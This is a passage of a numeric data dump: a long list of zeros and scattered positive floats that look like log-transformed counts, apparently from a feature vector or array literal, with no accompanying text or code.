0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 4.02535169073515, 0.0, 0.0, 0.0, 2.9957322735539913, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0.0, 0.0, 0.0, \n 7.9730554676126895, 0.0, 0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 11.613215656391521, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 3.2958368660043296, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 5.8066078281957605, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 4.182806904693496, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 1.6094379124341003, 0.0, 0, 0.0, 0, 0, 0.0, 1.9459101490553132, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 3.0841946160253877, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.970291913552122, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.77912349311153, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 10.73885431325499, 0, 0.0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0,\n 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 1.9459101490553132,\n 0.0, 2.8398715690385097, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 2.1972245773362196, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 2.70805020110221, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 1.6094379124341003, 1.0986122886681098, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 9.19044141596179, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.4825185607408002, 0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 4.804021044733257, 0.0, 0, 0.0, 0.0, \n 2.9957322735539913, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0, 3.8918202981106265, 3.649511027115099, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.4339872044851467, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.7612001156935624, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 